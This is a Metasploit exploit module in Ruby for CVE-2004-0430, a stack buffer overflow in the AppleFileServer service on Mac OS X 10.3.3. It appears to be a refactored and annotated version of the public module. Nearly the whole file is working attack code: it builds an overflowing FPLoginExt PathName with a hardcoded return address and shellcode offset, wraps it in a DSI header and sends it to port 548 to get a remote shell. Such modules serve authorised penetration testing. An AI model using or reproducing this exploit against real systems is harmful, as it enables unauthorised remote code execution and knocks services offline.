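##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Size in bytes of the oversized PathName field sent in FPLoginExt.
  PATH_LEN = 1024
  # Byte offset inside the PathName at which the saved return address is overwritten.
  RET_OFFSET = 168
  # Byte offset inside the PathName at which the encoded payload is placed
  # (directly after the 4-byte return address).
  PAYLOAD_OFFSET = 172

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AppleFileServer LoginExt PathName Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the AppleFileServer service
        on MacOS X. This vulnerability was originally reported by Atstake and
        was actually one of the few useful advisories ever published by that
        company. You only have one chance to exploit this bug.
        This particular exploit uses a stack-based return address that will
        only work under optimal conditions.
      },
      'Author'         => 'hdm',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-0430' ],
          [ 'OSVDB', '5762' ],
          [ 'BID', '10271' ],
        ],
      'Payload'        =>
        {
          'Space'    => 512,
          # NUL would end the string copy; 0x20 was excluded by the original author.
          'BadChars' => "\x00\x20",
          'MinNops'  => 128,
          # Only find-socket payloads: the shell is served over the
          # already-open AFP connection.
          'Compat'   =>
            {
              'ConnectionType' => "+find"
            }
        },
      'Platform'       => %w{ osx },
      'Targets'        =>
        [
          # Target 0
          [
            'Mac OS X 10.3.3',
            {
              'Platform' => 'osx',
              'Arch'     => ARCH_PPC,
              # Raw stack address, not a trampoline: a miss crashes the
              # service and there is no second attempt.
              'Ret'      => 0xf0101c0c
            },
          ],
        ],
      'DisclosureDate' => '2004-05-03',
      'Notes'          =>
        {
          # The description is explicit that a failed attempt kills the service.
          'Stability'   => [CRASH_SERVICE_DOWN],
          'Reliability' => [],
          'SideEffects' => []
        }))

    # Configure the default port to be AFP
    register_options(
      [
        Opt::RPORT(548),
      ])
  end

  # Sends a single FPLoginExt request whose PathName field overflows a
  # stack buffer in AppleFileServer, then hands the connection to the
  # payload handler. The request is sent exactly once; see Description.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sock.put(dsi_command(fplogin_ext_request(overflow_pathname)))

    handler

    disconnect
  end

  # Builds the PATH_LEN-byte PathName buffer: 0xff filler with the target
  # return address at RET_OFFSET and the encoded payload at PAYLOAD_OFFSET.
  #
  # The buffer is forced to binary encoding so that the splices below work on
  # byte offsets and so that length fields derived from it are byte counts.
  # With a UTF-8 literal, String#[]= and #length count characters, and
  # splicing a binary string into a non-ASCII UTF-8 string raises
  # Encoding::CompatibilityError. (Metasploit's loader normally evaluates
  # modules with binary source encoding; this makes the module independent
  # of that.)
  #
  # @return [String] binary string of exactly PATH_LEN bytes
  def overflow_pathname
    ret = Rex::Arch.pack_addr(target.arch, target.ret)
    shellcode = payload.encoded

    # 'Space' => 512 is enforced by the framework, so
    # PAYLOAD_OFFSET + shellcode.bytesize never exceeds PATH_LEN.
    path = "\xff".b * PATH_LEN
    path[RET_OFFSET, ret.bytesize] = ret
    path[PAYLOAD_OFFSET, shellcode.bytesize] = shellcode
    path
  end

  # Serializes an FPLoginExt (command 0x3f) request body.
  #
  # Layout: command byte, pad byte, 2-byte flags, AFP version and UAM as
  # Pascal strings (1-byte length), then two AFPName fields (type byte,
  # 2-byte big-endian length, bytes) for the user name and the PathName.
  #
  # @param pathname [String] binary PathName field (the overflow buffer)
  # @return [String] binary AFP request body
  def fplogin_ext_request(pathname)
    afp = "\x3f\x00\x00\x00".b

    # Add the authentication methods
    ['AFP3.1', 'Cleartxt Passwrd'].each do |str|
      afp << [str.bytesize].pack('C') << str
    end

    # User name: AFPName type 3, 2-byte length, 9 random alphanumeric characters.
    afp << "\x03" << [9].pack('n') << rand_text_alphanumeric(9)
    # PathName: AFPName type 3; the length prefix is the byte count of the buffer.
    afp << "\x03" << [pathname.bytesize].pack('n') << pathname
    afp
  end

  # Wraps an AFP request body in a Data Stream Interface header using
  # command 2 (DSICommand).
  #
  # @param afp [String] serialized AFP request body
  # @return [String] DSI header followed by the AFP body
  def dsi_command(afp)
    header = [
      0,              # Flags
      2,              # Command: DSICommand
      rand(65536),    # XID / request ID
      0,              # Data Offset
      afp.bytesize,   # Data Length: byte count of the AFP body
      0               # Reserved
    ].pack('CCnNNN')

    header + afp
  end
end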